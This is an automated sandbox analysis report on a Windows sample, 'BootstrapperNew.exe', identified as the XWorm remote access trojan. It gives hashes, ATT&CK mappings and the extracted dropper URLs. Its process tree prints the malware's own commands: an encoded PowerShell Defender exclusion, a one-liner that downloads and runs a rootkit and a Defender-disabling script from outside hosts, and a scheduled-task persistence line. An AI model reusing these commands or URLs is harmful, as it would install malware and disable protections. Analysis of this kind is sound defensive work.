Overview

overview

10

Static

static

3

BootstrapperNew.exe

windows7-x64

BootstrapperNew.exe

windows10-2004-x64

Analysis

  • max time kernel
    17s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 13:23

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    BootstrapperNew.exe

  • Size

    2.9MB

  • MD5

    2326d97462601f0bf84459a19a23a307

  • SHA1

    b6d153b9984ad82202997707fe5e4fd135d3afb6

  • SHA256

    03cc93bdaefa6e5db157062dd90b796ff6a8f2f172e3be278e604ba9808f9ce4

  • SHA512

    fccf56201ca30da42c15d769a1af38d87f8bdc0562327096893e81738ad7a4a7e3c00cb425144e1ffa10d9e0e0f39fdd7e5287f74f88e4aa971aa3cc3e988568

  • SSDEEP

    49152:fCPqFzmYUMGs67ueIJdjo+fR60CqtZ4HdBJqlCmir3C7uXwonp1UECFgBT:f/DXVAu/kE69HHdB8lnirSSJqE+gT

Score
10/10
xwormdefense_evasiondiscoveryexecutionpersistencerattrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe
exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Attributes
  • Install_directory

    %port%

  • install_file

    svchost.exe

  • pastebin_url

    https://pastebin.com/raw/J42c6s7r

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
    "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2796
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAaQB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AZQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAaAB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAeABiACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2784
    • C:\Users\Admin\AppData\Local\BootstrapperNew.exe
      "C:\Users\Admin\AppData\Local\BootstrapperNew.exe"
      2⤵
      • Executes dropped EXE
      PID:3032
    • C:\Windows\Local Security Authority Process.exe
      "C:\Windows\Local Security Authority Process.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:772
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Local Security Authority Process" /tr "C:\Users\Admin\AppData\Roaming\Local Security Authority Process.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2044
      • C:\Windows\system32\shutdown.exe
        shutdown.exe /f /s /t 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1552
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0
    1⤵
      PID:1736
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x1
      1⤵
        PID:2332

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Defense Evasion

      Modify Registry

      1
      T1112

      Obfuscated Files or Information

      1
      T1027

      Command Obfuscation

      1
      T1027.010

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      1
      T1082

      System Location Discovery

      1
      T1614

      System Language Discovery

      1
      T1614.001

      Lateral Movement

      Collection

      Command and Control

      Web Service

      1
      T1102

      Exfiltration

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        Filesize

        71KB

        MD5

        83142242e97b8953c386f988aa694e4a

        SHA1

        833ed12fc15b356136dcdd27c61a50f59c5c7d50

        SHA256

        d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

        SHA512

        bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Tar284F.tmp
        Filesize

        183KB

        MD5

        109cab5505f5e065b63d01361467a83b

        SHA1

        4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

        SHA256

        ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

        SHA512

        753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YNG03JCUDWMLQHY0851B.temp
        Filesize

        7KB

        MD5

        97ae5e5df9a7373f2a7aeaf3c77fbb3b

        SHA1

        02c9586347b29950677aa7d4368ee96d5e7a311f

        SHA256

        88c21cde1a2abf1c3c8c1af658ec9227226b32367e24aa7d1fa91b7af45db451

        SHA512

        2d55ebe096a865e6b2c4990a3acb56df9938a63c6832d6fd233b52f76bd5298a2072d69ff18387259b5ff64e7e671ef090ab72418c4bc3f6e39caf26e3632538

        Download Submit

      • C:\Windows\Local Security Authority Process.exe
        Filesize

        55KB

        MD5

        cc170e6bb05ddb76e910e86ebb984d3c

        SHA1

        3a7473e8d705754257ae685db2d9a0f125a814aa

        SHA256

        b93f4dcb4b2b68370c18e6a7df1ea4d2c588826d6712d8e1493955c81735718b

        SHA512

        0d1b32949e6e3fd398b9ca783eabe870e807985958018036f1a0880870d8649dd31c13a8723e32a1a8869c6c7646f1e64a4d10fbcc73ffa4829aaf8ffd3fe28a

        Download Submit

      • \Users\Admin\AppData\Local\BootstrapperNew.exe
        Filesize

        2.9MB

        MD5

        f227cdfd423b3cc03bb69c49babf4da3

        SHA1

        3db5a97d9b0f2545e7ba97026af6c28512200441

        SHA256

        cb5d6c1ca0aa6232a2d55e14b20ac4a9945a0bd063c57d60a5ed3ae94160e3e8

        SHA512

        b10afd03b02a928545c16fad39a6ae46b68b1e1a2477a6990803ce80008e7161fb2ebc9380ba15a1b074bb436aa34bcd6c94a922933d438b1c22489717e1e10e

        Download Submit

      • memory/648-11-0x0000000000CD0000-0x0000000000CE4000-memory.dmp

        Filesize

        80KB

        Download

      • memory/772-33-0x000000001B7A0000-0x000000001BA82000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/772-34-0x00000000027E0000-0x00000000027E8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/3032-15-0x0000000000160000-0x000000000016A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3032-22-0x0000000000B50000-0x0000000000B76000-memory.dmp

        Filesize

        152KB

        Download

      • memory/3032-23-0x0000000000FD0000-0x0000000000FD8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/3032-24-0x0000000000FE0000-0x0000000000FF6000-memory.dmp

        Filesize

        88KB

        Download

      • memory/3032-25-0x0000000000FC0000-0x0000000000FCA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3032-26-0x00000000009B0000-0x00000000009BA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3032-27-0x0000000001000000-0x0000000001008000-memory.dmp

        Filesize

        32KB

        Download

      • memory/3032-21-0x00000000009C0000-0x00000000009CA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3032-20-0x000000001C7C0000-0x000000001C8C0000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/3032-17-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3032-36-0x0000000000160000-0x000000000016A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3032-16-0x0000000000160000-0x000000000016A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3032-12-0x00000000012D0000-0x00000000015B2000-memory.dmp

        Filesize

        2.9MB

        Download